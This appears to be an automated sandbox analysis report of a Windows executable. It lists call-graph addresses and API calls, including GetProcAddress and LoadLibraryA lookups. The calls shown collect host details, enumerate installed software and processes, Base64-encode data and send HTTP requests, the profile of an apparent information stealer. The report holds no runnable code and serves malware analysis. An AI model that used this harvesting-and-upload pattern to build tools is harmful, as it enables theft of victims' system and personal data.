HttpSendRequestA 58427 405f85 InternetReadFile 58426->58427 58428 405fba InternetCloseHandle 58427->58428 58432 405fb1 58427->58432 58428->58350 58430 41acc0 4 API calls 58430->58432 58431 41abb0 lstrcpy 58431->58432 58432->58427 58432->58428 58432->58430 58432->58431 59193 41ade0 58433->59193 58435 4112a7 strtok_s 58438 4112b4 58435->58438 58436 41139f 58436->57198 58437 41137b strtok_s 58437->58438 58438->58436 58438->58437 58439 41ab30 lstrlenA lstrcpy 58438->58439 58439->58438 59194 41ade0 58440->59194 58442 410fe7 strtok_s 58449 410ff4 58442->58449 58443 411147 58443->57206 58444 411123 strtok_s 58444->58449 58445 4110d4 StrCmpCA 58445->58449 58446 411057 StrCmpCA 58446->58449 58447 411097 StrCmpCA 58447->58449 58448 41ab30 lstrlenA lstrcpy 58448->58449 58449->58443 58449->58444 58449->58445 58449->58446 58449->58447 58449->58448 59195 41ade0 58450->59195 58452 411197 strtok_s 58456 4111a4 58452->58456 58453 411274 58453->57214 58454 4111e2 StrCmpCA 58454->58456 58455 41ab30 lstrlenA lstrcpy 58455->58456 58456->58453 58456->58454 58456->58455 58457 411250 strtok_s 58456->58457 58457->58456 58459 41aa50 lstrcpy 58458->58459 58460 411c76 58459->58460 58461 41acc0 4 API calls 58460->58461 58462 411c87 58461->58462 58463 41abb0 lstrcpy 58462->58463 58464 411c90 58463->58464 58465 41acc0 4 API calls 58464->58465 58466 411cab 58465->58466 58467 41abb0 lstrcpy 58466->58467 58468 411cb4 58467->58468 58469 41acc0 4 API calls 58468->58469 58470 411ccd 58469->58470 58471 41abb0 lstrcpy 58470->58471 58472 411cd6 58471->58472 58473 41acc0 4 API calls 58472->58473 58474 411cf1 58473->58474 58475 41abb0 lstrcpy 58474->58475 58476 411cfa 58475->58476 58477 41acc0 4 API calls 58476->58477 58478 411d13 58477->58478 58479 41abb0 lstrcpy 58478->58479 58480 411d1c 58479->58480 58481 41acc0 4 API calls 58480->58481 58482 411d37 58481->58482 58483 41abb0 lstrcpy 58482->58483 58484 411d40 58483->58484 58485 41acc0 4 API calls 58484->58485 58486 411d59 58485->58486 58487 41abb0 lstrcpy 58486->58487 58488 411d62 58487->58488 58489 41acc0 4 API calls 58488->58489 58490 411d7d 58489->58490 58491 41abb0 lstrcpy 58490->58491 58492 411d86 58491->58492 58493 41acc0 4 API calls 58492->58493 58494 411d9f 58493->58494 58495 41abb0 lstrcpy 58494->58495 58496 411da8 58495->58496 58497 41acc0 4 API calls 58496->58497 58498 411dc6 58497->58498 58499 41abb0 lstrcpy 58498->58499 58500 411dcf 58499->58500 58501 417690 6 API calls 58500->58501 58502 411de6 58501->58502 58503 41ac30 3 API calls 58502->58503 58504 411df9 58503->58504 58505 41abb0 lstrcpy 58504->58505 58506 411e02 58505->58506 58507 41acc0 4 API calls 58506->58507 58508 411e2c 58507->58508 58509 41abb0 lstrcpy 58508->58509 58510 411e35 58509->58510 58511 41acc0 4 API calls 58510->58511 58512 411e55 58511->58512 58513 41abb0 lstrcpy 58512->58513 58514 411e5e 58513->58514 59196 417820 GetProcessHeap HeapAlloc 58514->59196 58517 41acc0 4 API calls 58518 411e7e 58517->58518 58519 41abb0 lstrcpy 58518->58519 58520 411e87 58519->58520 58521 41acc0 4 API calls 58520->58521 58522 411ea6 58521->58522 58523 41abb0 lstrcpy 58522->58523 58524 411eaf 58523->58524 58525 41acc0 4 API calls 58524->58525 58526 411ed0 58525->58526 58527 41abb0 lstrcpy 58526->58527 58528 411ed9 58527->58528 59203 417950 GetCurrentProcess IsWow64Process 58528->59203 58531 41acc0 4 API calls 58532 411ef9 58531->58532 58533 41abb0 lstrcpy 58532->58533 58534 411f02 58533->58534 58535 41acc0 4 API calls 58534->58535 58536 411f21 58535->58536 58537 41abb0 lstrcpy 58536->58537 58538 411f2a 58537->58538 58539 41acc0 4 API calls 58538->58539 58540 411f4b 58539->58540 58541 41abb0 lstrcpy 58540->58541 58542 411f54 58541->58542 58543 4179e0 3 API calls 58542->58543 58544 411f64 58543->58544 58545 41acc0 4 API calls 58544->58545 58546 411f74 58545->58546 58547 41abb0 lstrcpy 58546->58547 58548 411f7d 58547->58548 58549 41acc0 4 API calls 58548->58549 58550 411f9c 58549->58550 58551 41abb0 lstrcpy 58550->58551 58552 411fa5 58551->58552 58553 41acc0 4 API calls 58552->58553 58554 411fc5 58553->58554 58555 41abb0 lstrcpy 58554->58555 58556 411fce 58555->58556 58557 417a70 3 API calls 58556->58557 58558 411fde 58557->58558 58559 41acc0 4 API calls 58558->58559 58560 411fee 58559->58560 58561 41abb0 lstrcpy 58560->58561 58562 411ff7 58561->58562 58563 41acc0 4 API calls 58562->58563 58564 412016 58563->58564 58565 41abb0 lstrcpy 58564->58565 58566 41201f 58565->58566 58567 41acc0 4 API calls 58566->58567 58568 412040 58567->58568 58569 41abb0 lstrcpy 58568->58569 58570 412049 58569->58570 59205 417b10 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 58570->59205 58573 41acc0 4 API calls 58574 412069 58573->58574 58575 41abb0 lstrcpy 58574->58575 58576 412072 58575->58576 58577 41acc0 4 API calls 58576->58577 58578 412091 58577->58578 58579 41abb0 lstrcpy 58578->58579 58580 41209a 58579->58580 58581 41acc0 4 API calls 58580->58581 58582 4120bb 58581->58582 58583 41abb0 lstrcpy 58582->58583 58584 4120c4 58583->58584 59207 417bc0 GetProcessHeap HeapAlloc GetTimeZoneInformation 58584->59207 58587 41acc0 4 API calls 58588 4120e4 58587->58588 58589 41abb0 lstrcpy 58588->58589 58590 4120ed 58589->58590 58591 41acc0 4 API calls 58590->58591 58592 41210c 58591->58592 58593 41abb0 lstrcpy 58592->58593 58594 412115 58593->58594 58595 41acc0 4 API calls 58594->58595 58596 412135 58595->58596 58597 41abb0 lstrcpy 58596->58597 58598 41213e 58597->58598 59210 417c90 GetUserDefaultLocaleName 58598->59210 58601 41acc0 4 API calls 58602 41215e 58601->58602 58603 41abb0 lstrcpy 58602->58603 58604 412167 58603->58604 58605 41acc0 4 API calls 58604->58605 58606 412186 58605->58606 58607 41abb0 lstrcpy 58606->58607 58608 41218f 58607->58608 58609 41acc0 4 API calls 58608->58609 58610 4121b0 58609->58610 58611 41abb0 lstrcpy 58610->58611 58612 4121b9 58611->58612 59215 417d20 58612->59215 58614 4121d0 58615 41ac30 3 API calls 58614->58615 58616 4121e3 58615->58616 58617 41abb0 lstrcpy 58616->58617 58618 4121ec 58617->58618 58619 41acc0 4 API calls 58618->58619 58620 412216 58619->58620 58621 41abb0 lstrcpy 58620->58621 58622 41221f 58621->58622 58623 41acc0 4 API calls 58622->58623 58624 41223f 58623->58624 58625 41abb0 lstrcpy 58624->58625 58626 412248 58625->58626 59227 417f10 GetSystemPowerStatus 58626->59227 58629 41acc0 4 API calls 58630 412268 58629->58630 58631 41abb0 lstrcpy 58630->58631 58632 412271 58631->58632 58633 41acc0 4 API calls 58632->58633 58634 412290 58633->58634 58635 41abb0 lstrcpy 58634->58635 58636 412299 58635->58636 58637 41acc0 4 API calls 58636->58637 58638 4122ba 58637->58638 58639 41abb0 lstrcpy 58638->58639 58640 4122c3 58639->58640 58641 4122ce GetCurrentProcessId 58640->58641 59229 419600 OpenProcess 58641->59229 58644 41ac30 3 API calls 58645 4122f4 58644->58645 58646 41abb0 lstrcpy 58645->58646 58647 4122fd 58646->58647 58648 41acc0 4 API calls 58647->58648 58649 412327 58648->58649 58650 41abb0 lstrcpy 58649->58650 58651 412330 58650->58651 58652 41acc0 4 API calls 58651->58652 58653 412350 58652->58653 58654 41abb0 lstrcpy 58653->58654 58655 412359 58654->58655 59234 417f90 GetProcessHeap HeapAlloc RegOpenKeyExA 58655->59234 58658 41acc0 4 API calls 58659 412379 58658->58659 58660 41abb0 lstrcpy 58659->58660 58661 412382 58660->58661 58662 41acc0 4 API calls 58661->58662 58663 4123a1 58662->58663 58664 41abb0 lstrcpy 58663->58664 58665 4123aa 58664->58665 58666 41acc0 4 API calls 58665->58666 58667 4123cb 58666->58667 58668 41abb0 lstrcpy 58667->58668 58669 4123d4 58668->58669 59238 4180f0 58669->59238 58672 41acc0 4 API calls 58673 4123f4 58672->58673 58674 41abb0 lstrcpy 58673->58674 58675 4123fd 58674->58675 58676 41acc0 4 API calls 58675->58676 58677 41241c 58676->58677 58678 41abb0 lstrcpy 58677->58678 58679 412425 58678->58679 58680 41acc0 4 API calls 58679->58680 58681 412446 58680->58681 58682 41abb0 lstrcpy 58681->58682 58683 41244f 58682->58683 59253 418060 GetSystemInfo wsprintfA 58683->59253 58686 41acc0 4 API calls 58687 41246f 58686->58687 58688 41abb0 lstrcpy 58687->58688 58689 412478 58688->58689 58690 41acc0 4 API calls 58689->58690 58691 412497 58690->58691 58692 41abb0 lstrcpy 58691->58692 58693 4124a0 58692->58693 58694 41acc0 4 API calls 58693->58694 58695 4124c0 58694->58695 58696 41abb0 lstrcpy 58695->58696 58697 4124c9 58696->58697 59255 418290 GetProcessHeap HeapAlloc 58697->59255 58700 41acc0 4 API calls 58701 4124e9 58700->58701 58702 41abb0 lstrcpy 58701->58702 58703 4124f2 58702->58703 58704 41acc0 4 API calls 58703->58704 58705 412511 58704->58705 58706 41abb0 lstrcpy 58705->58706 58707 41251a 58706->58707 58708 41acc0 4 API calls 58707->58708 58709 41253b 58708->58709 58710 41abb0 lstrcpy 58709->58710 58711 412544 58710->58711 59261 418950 58711->59261 58714 41ac30 3 API calls 58715 41256e 58714->58715 58716 41abb0 lstrcpy 58715->58716 58717 412577 58716->58717 58718 41acc0 4 API calls 58717->58718 58719 4125a1 58718->58719 58720 41abb0 lstrcpy 58719->58720 58721 4125aa 58720->58721 58722 41acc0 4 API calls 58721->58722 58723 4125ca 58722->58723 58724 41abb0 lstrcpy 58723->58724 58725 4125d3 58724->58725 58726 41acc0 4 API calls 58725->58726 58727 4125f2 58726->58727 58728 41abb0 lstrcpy 58727->58728 58729 4125fb 58728->58729 59266 418380 58729->59266 58731 412612 58732 41ac30 3 API calls 58731->58732 58733 412625 58732->58733 58734 41abb0 lstrcpy 58733->58734 58735 41262e 58734->58735 58736 41acc0 4 API calls 58735->58736 58737 41265a 58736->58737 58738 41abb0 lstrcpy 58737->58738 58739 412663 58738->58739 58740 41acc0 4 API calls 58739->58740 58741 412682 58740->58741 58742 41abb0 lstrcpy 58741->58742 58743 41268b 58742->58743 58744 41acc0 4 API calls 58743->58744 58745 4126ac 58744->58745 58746 41abb0 lstrcpy 58745->58746 58747 4126b5 58746->58747 58748 41acc0 4 API calls 58747->58748 58749 4126d4 58748->58749 58750 41abb0 lstrcpy 58749->58750 58751 4126dd 58750->58751 58752 41acc0 4 API calls 58751->58752 58753 4126fe 58752->58753 58754 41abb0 lstrcpy 58753->58754 58755 412707 58754->58755 59274 4184b0 58755->59274 58757 412723 58758 41ac30 3 API calls 58757->58758 58759 412736 58758->58759 58760 41abb0 lstrcpy 58759->58760 58761 41273f 58760->58761 58762 41acc0 4 API calls 58761->58762 58763 412769 58762->58763 58764 41abb0 lstrcpy 58763->58764 58765 412772 58764->58765 58766 41acc0 4 API calls 58765->58766 58767 412793 58766->58767 58768 41abb0 lstrcpy 58767->58768 58769 41279c 58768->58769 58770 4184b0 17 API calls 58769->58770 58771 4127b8 58770->58771 58772 41ac30 3 API calls 58771->58772 58773 4127cb 58772->58773 58774 41abb0 lstrcpy 58773->58774 58775 4127d4 58774->58775 58776 41acc0 4 API calls 58775->58776 58777 4127fe 58776->58777 58778 41abb0 lstrcpy 58777->58778 58779 412807 58778->58779 58780 41acc0 4 API calls 58779->58780 58781 412826 58780->58781 58782 41abb0 lstrcpy 58781->58782 58783 41282f 58782->58783 58784 41acc0 4 API calls 58783->58784 58785 412850 58784->58785 58786 41abb0 lstrcpy 58785->58786 58787 412859 58786->58787 59310 418810 58787->59310 58789 412870 58790 41ac30 3 API calls 58789->58790 58791 412883 58790->58791 58792 41abb0 lstrcpy 58791->58792 58793 41288c 58792->58793 58794 4128aa lstrlenA 58793->58794 58795 4128ba 58794->58795 58796 41aa50 lstrcpy 58795->58796 58797 4128cc 58796->58797 58798 401590 lstrcpy 58797->58798 58799 4128dd 58798->58799 59320 4153e0 58799->59320 58801 4128e9 58801->57218 59515 41ade0 58802->59515 58804 405059 InternetOpenUrlA 58807 405071 58804->58807 59146 41aab0 lstrcpy 59145->59146 59147 4016c3 59146->59147 59148 41aab0 lstrcpy 59147->59148 59149 4016d5 59148->59149 59150 41aab0 lstrcpy 59149->59150 59151 4016e7 59150->59151 59152 41aab0 lstrcpy 59151->59152 59153 4015a3 59152->59153 59153->58049 59182 401030 59154->59182 59158 404888 lstrlenA 59185 41ade0 59158->59185 59160 404898 InternetCrackUrlA 59161 4048b7 59160->59161 59161->58126 59163 41aa50 lstrcpy 59162->59163 59164 418d04 59163->59164 59165 41aa50 lstrcpy 59164->59165 59166 418d12 GetSystemTime 59165->59166 59168 418d29 59166->59168 59167 41aab0 lstrcpy 59169 418d8c 59167->59169 59168->59167 59169->58141 59172 41ac41 59170->59172 59171 41ac98 59173 41aab0 lstrcpy 59171->59173 59172->59171 59174 41ac78 lstrcpy lstrcatA 59172->59174 59175 41aca4 59173->59175 59174->59171 59175->58144 59176->58259 59178 40a249 LocalAlloc 59177->59178 59179 404f3e 59177->59179 59178->59179 59180 40a264 CryptStringToBinaryA 59178->59180 59179->58147 59179->58150 59180->59179 59181 40a289 LocalFree 59180->59181 59181->59179 59183 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 59182->59183 59184 41ade0 59183->59184 59184->59158 59185->59160 59186->58269 59187->58414 59188->58416 59189->58418 59190->58420 59191->58424 59192->58426 59193->58435 59194->58442 59195->58452 59327 417930 59196->59327 59199 417856 RegOpenKeyExA 59201 417894 RegCloseKey 59199->59201 59202 417877 RegQueryValueExA 59199->59202 59200 411e6e 59200->58517 59201->59200 59202->59201 59204 411ee9 59203->59204 59204->58531 59206 412059 59205->59206 59206->58573 59208 417c2a wsprintfA 59207->59208 59209 4120d4 59207->59209 59208->59209 59209->58587 59211 41214e 59210->59211 59212 417cdd 59210->59212 59211->58601 59334 418eb0 LocalAlloc CharToOemW 59212->59334 59214 417ce9 59214->59211 59216 41aa50 lstrcpy 59215->59216 59217 417d5c GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 59216->59217 59226 417db5 59217->59226 59218 417dd6 GetLocaleInfoA 59218->59226 59219 417ea8 59220 417eb8 59219->59220 59221 417eae LocalFree 59219->59221 59223 41aab0 lstrcpy 59220->59223 59221->59220 59222 41acc0 lstrcpy lstrlenA lstrcpy lstrcatA 59222->59226 59225 417ec7 59223->59225 59224 41abb0 lstrcpy 59224->59226 59225->58614 59226->59218 59226->59219 59226->59222 59226->59224 59228 412258 59227->59228 59228->58629 59230 419623 K32GetModuleFileNameExA CloseHandle 59229->59230 59231 419645 59229->59231 59230->59231 59232 41aa50 lstrcpy 59231->59232 59233 4122e1 59232->59233 59233->58644 59235 412369 59234->59235 59236 417ff8 RegQueryValueExA 59234->59236 59235->58658 59237 41801e RegCloseKey 59236->59237 59237->59235 59239 418149 GetLogicalProcessorInformationEx 59238->59239 59240 4181b9 59239->59240 59241 418168 GetLastError 59239->59241 59337 418b80 GetProcessHeap HeapFree 59240->59337 59242 418173 59241->59242 59243 4181b2 59241->59243 59252 41817c 59242->59252 59246 4123e4 59243->59246 59338 418b80 GetProcessHeap HeapFree 59243->59338 59246->58672 59249 41820b 59249->59246 59251 418214 wsprintfA 59249->59251 59250 4181a6 59250->59246 59251->59246 59252->59239 59252->59250 59335 418b80 GetProcessHeap HeapFree 59252->59335 59336 418ba0 GetProcessHeap HeapAlloc 59252->59336 59254 41245f 59253->59254 59254->58686 59256 418b40 59255->59256 59257 4182dd GlobalMemoryStatusEx 59256->59257 59260 4182f3 __aulldiv 59257->59260 59258 41832b wsprintfA 59259 4124d9 59258->59259 59259->58700 59260->59258 59262 41898b GetProcessHeap HeapAlloc wsprintfA 59261->59262 59264 41aa50 lstrcpy 59262->59264 59265 41255b 59264->59265 59265->58714 59267 41aa50 lstrcpy 59266->59267 59271 4183b9 59267->59271 59268 4183f3 59270 41aab0 lstrcpy 59268->59270 59269 41acc0 lstrcpy lstrlenA lstrcpy lstrcatA 59269->59271 59272 41846c 59270->59272 59271->59268 59271->59269 59273 41abb0 lstrcpy 59271->59273 59272->58731 59273->59271 59275 41aa50 lstrcpy 59274->59275 59276 4184ec RegOpenKeyExA 59275->59276 59277 418560 59276->59277 59278 41853e 59276->59278 59280 4187a3 RegCloseKey 59277->59280 59281 418588 RegEnumKeyExA 59277->59281 59279 41aab0 lstrcpy 59278->59279 59290 41854d 59279->59290 59284 41aab0 lstrcpy 59280->59284 59282 4185cf wsprintfA RegOpenKeyExA 59281->59282 59283 41879e 59281->59283 59285 418651 RegQueryValueExA 59282->59285 59286 418615 RegCloseKey RegCloseKey 59282->59286 59283->59280 59284->59290 59288 418791 RegCloseKey 59285->59288 59289 41868a lstrlenA 59285->59289 59287 41aab0 lstrcpy 59286->59287 59287->59290 59288->59283 59289->59288 59291 4186a0 59289->59291 59290->58757 59292 41acc0 4 API calls 59291->59292 59293 4186b7 59292->59293 59294 41abb0 lstrcpy 59293->59294 59295 4186c3 59294->59295 59296 41acc0 4 API calls 59295->59296 59297 4186e7 59296->59297 59298 41abb0 lstrcpy 59297->59298 59299 4186f3 59298->59299 59300 4186fe RegQueryValueExA 59299->59300 59300->59288 59301 418733 59300->59301 59302 41acc0 4 API calls 59301->59302 59303 41874a 59302->59303 59304 41abb0 lstrcpy 59303->59304 59305 418756 59304->59305 59306 41acc0 4 API calls 59305->59306 59307 41877a 59306->59307 59308 41abb0 lstrcpy 59307->59308 59309 418786 59308->59309 59309->59288 59311 41aa50 lstrcpy 59310->59311 59312 41884c CreateToolhelp32Snapshot Process32First 59311->59312 59313 418878 Process32Next 59312->59313 59314 4188ed CloseHandle 59312->59314 59313->59314 59319 41888d 59313->59319 59315 41aab0 lstrcpy 59314->59315 59318 418906 59315->59318 59316 41acc0 lstrcpy lstrlenA lstrcpy lstrcatA 59316->59319 59317 41abb0 lstrcpy 59317->59319 59318->58789 59319->59313 59319->59316 59319->59317 59321 41aab0 lstrcpy 59320->59321 59322 415405 59321->59322 59323 401590 lstrcpy 59322->59323 59324 415416 59323->59324 59339 405150 59324->59339 59326 41541f 59326->58801 59330 4178b0 GetProcessHeap HeapAlloc RegOpenKeyExA 59327->59330 59329 417849 59329->59199 59329->59200 59331 417910 RegCloseKey 59330->59331 59332 4178f5 RegQueryValueExA 59330->59332 59333 417923 59331->59333 59332->59331 59333->59329 59334->59214 59335->59252 59336->59252 59337->59249 59338->59246 59340 41aab0 lstrcpy 59339->59340 59341 405169 59340->59341 59342 404800 5 API calls 59341->59342 59343 405175 59342->59343 59501 419030 59343->59501 59345 4051d4 59346 4051e2 lstrlenA 59345->59346 59347 4051f5 59346->59347 59348 419030 4 API calls 59347->59348 59349 405206 59348->59349 59350 41aa50 lstrcpy 59349->59350 59351 405219 59350->59351 59352 41aa50 lstrcpy 59351->59352 59353 405226 59352->59353 59354 41aa50 lstrcpy 59353->59354 59355 405233 59354->59355 59356 41aa50 lstrcpy 59355->59356 59357 405240 59356->59357 59358 41aa50 lstrcpy 59357->59358 59359 40524d InternetOpenA StrCmpCA 59358->59359 59360 40527f 59359->59360 59361 405914 InternetCloseHandle 59360->59361 59362 418cf0 3 API calls 59360->59362 59368 405929 moneypunct 59361->59368 59363 40529e 59362->59363 59364 41ac30 3 API calls 59363->59364 59365 4052b1 59364->59365 59366 41abb0 lstrcpy 59365->59366 59367 4052ba 59366->59367 59369 41acc0 4 API calls 59367->59369 59372 41aab0 lstrcpy 59368->59372 59370 4052fb 59369->59370 59371 41ac30 3 API calls 59370->59371 59373 405302 59371->59373 59379 405963 59372->59379 59374 41acc0 4 API calls 59373->59374 59375 405309 59374->59375 59376 41abb0 lstrcpy 59375->59376 59379->59326 59502 419039 59501->59502 59503 41903d CryptBinaryToStringA 59501->59503 59502->59345 59503->59502 59504 41905e GetProcessHeap HeapAlloc 59503->59504 59505 419080 59504->59505 59506 419084 moneypunct 59504->59506 59505->59502 59507 419095 CryptBinaryToStringA 59506->59507 59507->59505 59515->58804 61101 6c60b694 61102 6c60b6a0 ___scrt_is_nonwritable_in_current_image 61101->61102 61131 6c60af2a 61102->61131 61104 6c60b6a7 61105 6c60b6d1 61104->61105 61106 6c60b796 61104->61106 61123 6c60b6ac ___scrt_is_nonwritable_in_current_image 61104->61123 61135 6c60b064 61105->61135 61148 6c60b1f7 IsProcessorFeaturePresent 61106->61148 61109 6c60b6e0 __RTC_Initialize 61109->61123 61138 6c60bf89 InitializeSListHead 61109->61138 61110 6c60b7b3 ___scrt_uninitialize_crt __RTC_Initialize 61112 6c60b6ee ___scrt_initialize_default_local_stdio_options 61116 6c60b6f3 _initterm_e 61112->61116 61113 6c60b79d ___scrt_is_nonwritable_in_current_image 61113->61110 61114 6c60b7d2 61113->61114 61115 6c60b828 61113->61115 61152 6c60b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 61114->61152 61117 6c60b1f7 ___scrt_fastfail 6 API calls 61115->61117 61119 6c60b708 61116->61119 61116->61123 61120 6c60b82f 61117->61120 61139 6c60b072 61119->61139 61126 6c60b83b 61120->61126 61127 6c60b86e dllmain_crt_process_detach 61120->61127 61121 6c60b7d7 61153 6c60bf95 __std_type_info_destroy_list 61121->61153 61125 6c60b70d 61125->61123 61128 6c60b711 _initterm 61125->61128 61129 6c60b860 dllmain_crt_process_attach 61126->61129 61130 6c60b840 61126->61130 61127->61130 61128->61123 61129->61130 61132 6c60af33 61131->61132 61154 6c60b341 IsProcessorFeaturePresent 61132->61154 61134 6c60af3f ___scrt_uninitialize_crt 61134->61104 61155 6c60af8b 61135->61155 61137 6c60b06b 61137->61109 61138->61112 61140 6c60b077 ___scrt_release_startup_lock 61139->61140 61141 6c60b07b 61140->61141 61143 6c60b082 61140->61143 61165 6c60b341 IsProcessorFeaturePresent 61141->61165 61145 6c60b087 _configure_narrow_argv 61143->61145 61144 6c60b080 61144->61125 61146 6c60b092 61145->61146 61147 6c60b095 _initialize_narrow_environment 61145->61147 61146->61125 61147->61144 61149 6c60b20c ___scrt_fastfail 61148->61149 61150 6c60b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 61149->61150 61151 6c60b302 ___scrt_fastfail 61150->61151 61151->61113 61152->61121 61153->61110 61154->61134 61156 6c60af9a 61155->61156 61157 6c60af9e 61155->61157 61156->61137 61158 6c60b028 61157->61158 61161 6c60afab ___scrt_release_startup_lock 61157->61161 61159 6c60b1f7 ___scrt_fastfail 6 API calls 61158->61159 61160 6c60b02f 61159->61160 61162 6c60afb8 _initialize_onexit_table 61161->61162 61163 6c60afd6 61161->61163 61162->61163 61164 6c60afc7 _initialize_onexit_table 61162->61164 61163->61137 61164->61163 61165->61144 61166 6c5d3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 61171 6c60ab2a 61166->61171 61170 6c5d30db 61175 6c60ae0c _crt_atexit _register_onexit_function 61171->61175 61173 6c5d30cd 61174 6c60b320 5 API calls ___raise_securityfailure 61173->61174 61174->61170 61175->61173 61176 6c5d35a0 61177 6c5d35c4 InitializeCriticalSectionAndSpinCount getenv 61176->61177 61192 6c5d3846 __aulldiv 61176->61192 61179 6c5d38fc strcmp 61177->61179 61180 6c5d35f3 __aulldiv 61177->61180 61179->61180 61182 6c5d3912 strcmp 61179->61182 61183 6c5d35f8 QueryPerformanceFrequency 61180->61183 61184 6c5d3622 _strnicmp 61180->61184 61185 6c5d3944 _strnicmp 61180->61185 61187 6c5d395d 61180->61187 61188 6c5d3664 GetSystemTimeAdjustment 61180->61188 61190 6c5d375c 61180->61190 61181 6c5d38f4 61182->61180 61183->61180 61184->61180 61184->61185 61185->61180 61185->61187 61186 6c5d376a QueryPerformanceCounter EnterCriticalSection 61189 6c5d37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 61186->61189 61186->61190 61188->61180 61189->61190 61191 6c5d37fc LeaveCriticalSection 61189->61191 61190->61186 61190->61189 61190->61191 61190->61192 61191->61190 61191->61192 61193 6c60b320 5 API calls ___raise_securityfailure 61192->61193 61193->61181 61194 6c60b8ae 61196 6c60b8ba ___scrt_is_nonwritable_in_current_image 61194->61196 61195 6c60b8e3 dllmain_raw 61198 6c60b8fd dllmain_crt_dispatch 61195->61198 61205 6c60b8c9 61195->61205 61196->61195 61197 6c60b8de 61196->61197 61196->61205 61207 6c5ebed0 DisableThreadLibraryCalls LoadLibraryExW 61197->61207 61198->61197 61198->61205 61200 6c60b91e 61201 6c60b94a 61200->61201 61208 6c5ebed0 DisableThreadLibraryCalls LoadLibraryExW 61200->61208 61202 6c60b953 dllmain_crt_dispatch 61201->61202 61201->61205 61203 6c60b966 dllmain_raw 61202->61203 61202->61205 61203->61205 61206 6c60b936 dllmain_crt_dispatch dllmain_raw 61206->61201 61207->61200 61208->61206 61209 6c5ec930 GetSystemInfo VirtualAlloc 61210 6c5ec9a3 GetSystemInfo 61209->61210 61211 6c5ec973 61209->61211 61213 6c5ec9b6 61210->61213 61214 6c5ec9d0 61210->61214 61225 6c60b320 5 API calls ___raise_securityfailure 61211->61225 61213->61214 61217 6c5ec9bd 61213->61217 61214->61211 61215 6c5ec9d8 VirtualAlloc 61214->61215 61219 6c5ec9ec 61215->61219 61220 6c5ec9f0 61215->61220 61216 6c5ec99b 61217->61211 61218 6c5ec9c1 VirtualFree 61217->61218 61218->61211 61219->61211 61226 6c60cbe8 GetCurrentProcess TerminateProcess 61220->61226 61225->61216

                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 00419F20 Relevance: 231.7, APIs: 112, Strings: 20, Instructions: 684libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 633 419f20-419f2a 634 419f30-41a341 GetProcAddress * 43 633->634 635 41a346-41a3da LoadLibraryA * 8 633->635 634->635 636 41a456-41a45d 635->636 637 41a3dc-41a451 GetProcAddress * 5 635->637 638 41a463-41a521 GetProcAddress * 8 636->638 639 41a526-41a52d 636->639 637->636 638->639 640 41a5a8-41a5af 639->640 641 41a52f-41a5a3 GetProcAddress * 5 639->641 642 41a5b5-41a642 GetProcAddress * 6 640->642 643 41a647-41a64e 640->643 641->640 642->643 644 41a654-41a72a GetProcAddress * 9 643->644 645 41a72f-41a736 643->645 644->645 646 41a7b2-41a7b9 645->646 647 41a738-41a7ad GetProcAddress * 5 645->647 648 41a7bb-41a7e7 GetProcAddress * 2 646->648 649 41a7ec-41a7f3 646->649 647->646 648->649 650 41a825-41a82c 649->650 651 41a7f5-41a820 GetProcAddress * 2 649->651 652 41a922-41a929 650->652 653 41a832-41a91d GetProcAddress * 10 650->653 651->650 654 41a92b-41a988 GetProcAddress * 4 652->654 655 41a98d-41a994 652->655 653->652 654->655 656 41a996-41a9a9 GetProcAddress 655->656 657 41a9ae-41a9b5 655->657 656->657 658 41a9b7-41aa13 GetProcAddress * 4 657->658 659 41aa18-41aa19 657->659 658->659
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007948C0), ref: 00419F3D
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007946C0), ref: 00419F55
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BEA0), ref: 00419F6E
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BF18), ref: 00419F86
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BF60), ref: 00419F9E
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BEB8), ref: 00419FB7
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,00799470), ref: 00419FCF
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BF30), ref: 00419FE7
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BF48), ref: 0041A000
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BED0), ref: 0041A018
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079BEE8), ref: 0041A030
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,00794860), ref: 0041A049
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,00794780), ref: 0041A061
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,00794840), ref: 0041A079
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,00794600), ref: 0041A092
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A0260), ref: 0041A0AA
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A0248), ref: 0041A0C2
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007991C8), ref: 0041A0DB
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007949E0), ref: 0041A0F3
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A01A0), ref: 0041A10B
